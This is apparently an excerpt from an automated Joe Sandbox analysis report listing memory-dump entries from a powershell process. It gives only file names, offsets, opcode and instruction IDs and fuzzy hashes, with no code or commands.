                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 891ff92243cc6e08bfea65e26b60b1f3aeb7a11f341a1bcd18a7d0ad23005f21
                            • Instruction ID: 646a0230882fbb6796a635089167996c3b5d0a9f3f81e3f3e767b28acdb11666
                            • Opcode Fuzzy Hash: 891ff92243cc6e08bfea65e26b60b1f3aeb7a11f341a1bcd18a7d0ad23005f21
                            • Instruction Fuzzy Hash: 6F41A570D1991D9FDB98EFA8D495AEDBBF1FF68301F500169E409E7291CB75A881CB00
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7b7d5fc00822eee796bfefbdd6e30877f224c0d03fa6853c0fd9413190c12b8
                            • Instruction ID: 88c22e4c453b1c0d784e68c4198d426d5e2f50fa64490ca287a4091291822b76
                            • Opcode Fuzzy Hash: e7b7d5fc00822eee796bfefbdd6e30877f224c0d03fa6853c0fd9413190c12b8
                            • Instruction Fuzzy Hash: BB11AC32E1DA1A0FF7A8B62C14552BC62C2EFD4291F040177DE0DD32E2DF08BC040289
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36a7536bc3f6a24b337ff8788298ad5e18fc3bdacebf6ff1b4c9b696a632244f
                            • Instruction ID: 4140ec80acb2016f915a643102f344a0e39584e705e8321b40278bb3f7ba7b3e
                            • Opcode Fuzzy Hash: 36a7536bc3f6a24b337ff8788298ad5e18fc3bdacebf6ff1b4c9b696a632244f
                            • Instruction Fuzzy Hash: 93119331E0DA469FE755EF58944427877E2FF1C365F5800BBC14CD71D2EA28A8458358
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43e7822759474716500eb09300f05258689b6fe76f4e351a1aa38a7987bd0a57
                            • Instruction ID: 3159ea642d237d679b067bb3d2e0a43d3d4e86b14909e1f21efd9c3cfbd97fb6
                            • Opcode Fuzzy Hash: 43e7822759474716500eb09300f05258689b6fe76f4e351a1aa38a7987bd0a57
                            • Instruction Fuzzy Hash: 0D018633F1ED1A1FF7AAA35C14252B991D2DF94691F5801BBD60EC31C6DF1C9C045289
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: 3758ae5b02bea70f67fe94c7435bb31095d1c9a914496b4f8bfd1143afb260cc
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: EE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E881CB46
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 99d8cd9937be2b096dc58b7d86808f265373864eb4bcca443a6216b4fe1a275f
                            • Instruction ID: 1333ded6ec329a7d1fe8ed0bcf190889afa2e8ed7df43aab24fc4c5afe99045f
                            • Opcode Fuzzy Hash: 99d8cd9937be2b096dc58b7d86808f265373864eb4bcca443a6216b4fe1a275f
                            • Instruction Fuzzy Hash: 0C01A92064E3C44FD347A33CA8186653F91AF43364F1C01FEE0C9CA5E3CA995816C356
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9670af5b2cb7c51ac81487badd89ea53f3ecb75e0b20ec82f0a58b442ee9a61e
                            • Instruction ID: 441ffda2fe7ff430f1210a7dbfaf7ef8bc055b07f477813991738fd274679c4b
                            • Opcode Fuzzy Hash: 9670af5b2cb7c51ac81487badd89ea53f3ecb75e0b20ec82f0a58b442ee9a61e
                            • Instruction Fuzzy Hash: EBF0F430E1890D8EDF90FBA8D451AACB7B1EF99341F600129D00DE3286CB39A8518B80
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb05cda167a1da8244d183a69e4158167b230500e322d805241a8e5d68650948
                            • Instruction ID: a605d202b973c56b70ce5af698247819a466d2e36cf08b7ff3b1b369ef76f736
                            • Opcode Fuzzy Hash: eb05cda167a1da8244d183a69e4158167b230500e322d805241a8e5d68650948
                            • Instruction Fuzzy Hash: 09F0B730A05A1C8FDB94EB28C450BA9B3B2EF5A744F9045E9D04DD3292CE35ADC1CF00